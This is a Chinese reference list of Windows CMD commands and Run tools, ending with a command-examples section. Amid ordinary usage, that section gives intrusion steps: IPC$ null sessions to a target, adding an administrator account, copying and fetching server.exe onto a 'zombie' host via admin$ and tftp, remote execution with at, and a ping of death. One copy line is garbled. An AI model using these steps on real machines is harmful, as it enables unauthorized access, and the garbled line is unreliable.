Windows命令大全

命令简介

CMD命令是一种命令提示符,CMD是command的缩写,即命令提示符(CMD),位于C:WindowsSystem32的目录下,是在OS/2,Win为基础的操作系统(包括Windows 2000和XP中,Vista中,和Server 2003)下的“MS-DOS 方式”。中文版Windows XP 中的命令提示符进一步提高了与DOS下操作命令的兼容性,用户可以在命令提示符直接输入中文调用文件。

运行流程

CMD命令:开始(Win+R)->运行->输入cmd或command(在命令行里可以看到系统版本、文件系统版本)如下图:
在这里插入图片描述

CMD命令—文件管理

命令 功能
MD 创建一个目录。
MKDIR 创建一个目录。
MKLINK 创建符号链接和硬链接
ASSOC 显示或修改文件扩展名关联。
ATTRIB 显示或更改文件属性。
FSUTIL 显示或配置文件系统属性。
MOVE 将一个或多个文件从一个目录移动到另一个目录。
COPY 将至少一个文件复制到另一个位置。
REN 重命名文件。
RENAME 重命名文件。
REPLACE 替换文件。
RMDIR 删除目录。
RD 删除目录。
DEL 删除至少一个文件。
ERASE 删除一个或多个文件。
XCOPY 复制文件和目录树。
FTYPE 显示或修改在文件扩展名关联中使用的文件类型。
CHDIR 显示当前目录的名称或将其更改。
CD 显示当前目录的名称或将其更改。
TREE 以图形方式显示驱动程序或路径的目录结构。
ROBOCOPY 复制文件和目录树的高级实用工具
COMP 比较两个或两套文件的内容。
FC 比较两个文件或两个文件集并显示它们之间的不同。
FOR 为一组文件中的每个文件运行一个指定的命令。
PATH 为可执行文件显示或设置搜索路径。

CMD命令—磁盘管理

命令 功能
DIR 显示一个目录中的文件和子目录。
CHKDSK 检查磁盘并显示状态报告。
CHKNTFS 显示或修改启动时间磁盘检查。
DISKPART 显示或配置磁盘分区属性。
FORMAT 格式化磁盘,以便用于 Windows。
LABEL 创建、更改或删除磁盘的卷标。
VERIFY 告诉 Windows 是否进行验证,以确保文件正确写入磁盘。
VOL 显示磁盘卷标和序列号。
RECOVER 从损坏的或有缺陷的磁盘中恢复可读信息。
CONVERT 将 FAT 卷转换成 NTFS。你不能转换当前驱动器。
COMPACT 显示或更改 NTFS 分区上文件的压缩。

CMD命令—系统管理

命令 功能
MODE 配置系统设备。
MORE 逐屏显示输出。
SET 显示、设置或删除 Windows 环境变量。
SETLOCAL 开始本地化批处理文件中的环境更改。
TIME 显示或设置系统时间。
DATE 显示或设置日期。
VER 显示 Windows 的版本。
SYSTEMINFO 显示计算机的特定属性和配置。
DRIVERQUERY 显示当前设备驱动程序状态和属性。
PROMPT 更改 Windows 命令提示。
BREAK 设置或清除扩展式 CTRL+C 检查。
BCDEDIT 设置启动数据库中的属性以控制启动加载。

CMD命令—进程管理

命令 功能
CALL 从另一个批处理程序调用这一个。
SC 显示或配置服务(后台进程)。
TASKLIST 显示包括服务在内的所有当前运行的任务。
TASKKILL 中止或停止正在运行的进程或应用程序。
IF 在批处理程序中执行有条件的处理操作。

CMD命令—控制台管理

命令 功能
CMD 打开另一个 Windows 命令解释程序窗口。
COLOR 设置默认控制台前景和背景颜色。
EXIT 退出 CMD.EXE 程序(命令解释程序)。
CLS 清除屏幕。
TITLE 设置 CMD.EXE 会话的窗口标题。
DOSKEY 编辑命令行、撤回 Windows 命令并创建宏。
ECHO 显示消息,或将命令回显打开或关闭。
PRINT 打印一个文本文件。
WMIC 在交互式命令 shell 中显示 WMI 信息。
HELP 提供 Windows 命令的帮助信息。
PAUSE 暂停批处理文件的处理并显示消息。

CMD命令—其他管理

命令 功能
TYPE 显示文本文件的内容。
CACLS 显示或修改文件的访问控制列表(ACL)。
CHCP 显示或设置活动代码页数。
ENDLOCAL 结束批文件中环境更改的本地化。
FIND 在一个或多个文件中搜索一个文本字符串。
FINDSTR 在多个文件中搜索字符串。
GOTO 将 Windows 命令解释程序定向到批处理程序中某个带标签的行。
GPRESULT 显示计算机或用户的组策略信息。
GRAFTABL 使 Windows 在图形模式下显示扩展字符集。
ICACLS 显示、修改、备份或还原文件和目录的 ACL。
OPENFILES 显示远程用户为了文件共享而打开的文件。
POPD 还原通过 PUSHD 保存的当前目录的上一个值。
PUSHD 保存当前目录,然后对其进行更改。
REM 记录批处理文件或 CONFIG.SYS 中的注释(批注)。
SCHTASKS 安排在一台计算机上运行命令和程序。
SHIFT 调整批处理文件中可替换参数的位置。
SHUTDOWN 允许通过本地或远程方式正确关闭计算机。
SORT 对输入排序。
START 启动单独的窗口以运行指定的程序或命令。
SUBST 将路径与驱动器号关联。

Windows运行工具

开始(Win+R)->运行->输入相关工具命令

  1. gpedit.msc-----组策略

  2. sndrec32-------录音机

  3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。

  4. explorer-------打开资源管理器

  5. logoff---------注销命令

  6. shutdown-------60秒倒计时关机命令

  7. lusrmgr.msc----本机用户和组

  8. services.msc—本地服务设置

  9. oobe/msoobe /a----检查XP是否激活

  10. notepad--------打开记事本

  11. cleanmgr-------垃圾整理

  12. net start messenger----开始信使服务

  13. compmgmt.msc—计算机管理

  14. net stop messenger-----停止信使服务

  15. conf-----------启动netmeeting

  16. dvdplay--------DVD播放器

  17. charmap--------启动字符映射表

  18. diskmgmt.msc—磁盘管理实用程序

  19. calc-----------启动计算器

  20. dfrg.msc-------磁盘碎片整理程序

  21. chkdsk.exe-----Chkdsk磁盘检查

  22. devmgmt.msc— 设备管理器

  23. regsvr32 /u *.dll----停止dll文件运行

  24. drwtsn32------ 系统医生

  25. rononce -p----15秒关机

  26. dxdiag---------检查DirectX信息

  27. regedt32-------注册表编辑器

  28. Msconfig.exe—系统配置实用程序

  29. rsop.msc-------组策略结果集

  30. mem.exe--------显示内存使用情况

  31. regedit.exe----注册表

  32. winchat--------XP自带局域网聊天

  33. progman--------程序管理器

  34. winmsd---------系统信息

  35. perfmon.msc----计算机性能监测程序

  36. winver---------检查Windows版本

  37. sfc /scannow-----扫描错误并复原

  38. taskmgr-----任务管理器(2000/xp/2003

  39. wmimgmt.msc----打开windows管理体系结构(WMI)

  40. wupdmgr--------windows更新程序

  41. wscript--------windows脚本宿主设置

  42. write----------写字板

  43. wiaacmgr-------扫描仪和照相机向导

  44. winchat--------XP自带局域网聊天

  45. mplayer2-------简易widnows media player

  46. mspaint--------画图板

  47. mstsc----------远程桌面连接

  48. magnify--------放大镜实用程序

  49. mmc------------打开控制台

  50. mobsync--------同步命令

  51. iexpress-------木马捆绑工具,系统自带

  52. fsmgmt.msc-----共享文件夹管理器

  53. utilman--------辅助工具管理器

  54. dcomcnfg-------打开系统组件服务

  55. ddeshare-------打开DDE共享设置

  56. osk------------打开屏幕键盘

  57. odbcad32-------ODBC数据源管理器

  58. oobe/msoobe /a----检查XP是否激活

  59. ntbackup-------系统备份和还原

  60. narrator-------屏幕“讲述人”

  61. ntmsmgr.msc----移动存储管理器

  62. ntmsoprq.msc—移动存储管理员操作请求

  63. netstat -an----(TC)命令检查接口

  64. syncapp--------创建一个公文包

  65. sysedit--------系统配置编辑器

  66. sigverif-------文件签名验证程序

  67. ciadv.msc------索引服务程序

  68. shrpubw--------创建共享文件夹

  69. secpol.msc-----本地安全策略

  70. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码

  71. services.msc—本地服务设置

  72. Sndvol32-------音量控制程序

  73. sfc.exe--------系统文件检查器

  74. sfc /scannow—windows文件保护

  75. ciadv.msc------索引服务程序

  76. tourstart------xp简介(安装完成后出现的漫游xp程序)

  77. taskmgr--------任务管理器

  78. eventvwr-------事件查看器

  79. dcedit-------造字程序

  80. mpmgmt.msc—计算机管理

  81. ckager-------对象包装程序

  82. perfmon.msc----计算机性能监测程序

  83. charmap--------启动字符映射表

  84. cliconfg-------SQL SERVER 客户端网络实用程序

  85. Clipbrd--------剪贴板查看器

  86. conf-----------启动netmeeting

  87. certmgr.msc----证书管理实用程序

  88. regsvr32 /u *.dll----停止dll文件运行

  89. regsvr32 /u zipfldr.dll------取消ZIP支持

  90. cmd.exe--------CMD命令提示符

操作示例

net use ipipc$ " " /user:" " 建立IPC空链接

net use ipipc$ “密码” /user:“用户名” 建立IPC非空链接

net use h: ipc$ “密码” /user:“用户名” 直接登陆后映射对方C:到本地为H:

net use h: ipc$ 登陆后映射对方C:到本地为H:

net use ipipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限
net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time 目标ip 查看对方时间

net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip “文本信息” 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR .”表示删除当前目录下所有只读文件,“DEL/A-S .”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,“> “和”> >” 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下

copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy ipadmin s v v . e x e c : 或 : c o p y i p a d m i n svv.exe c: 或:copyipadmin svv.exec::copyipadmin. 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件,用参数/e才可连目录下的子目录一起复制到目标地址下。

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息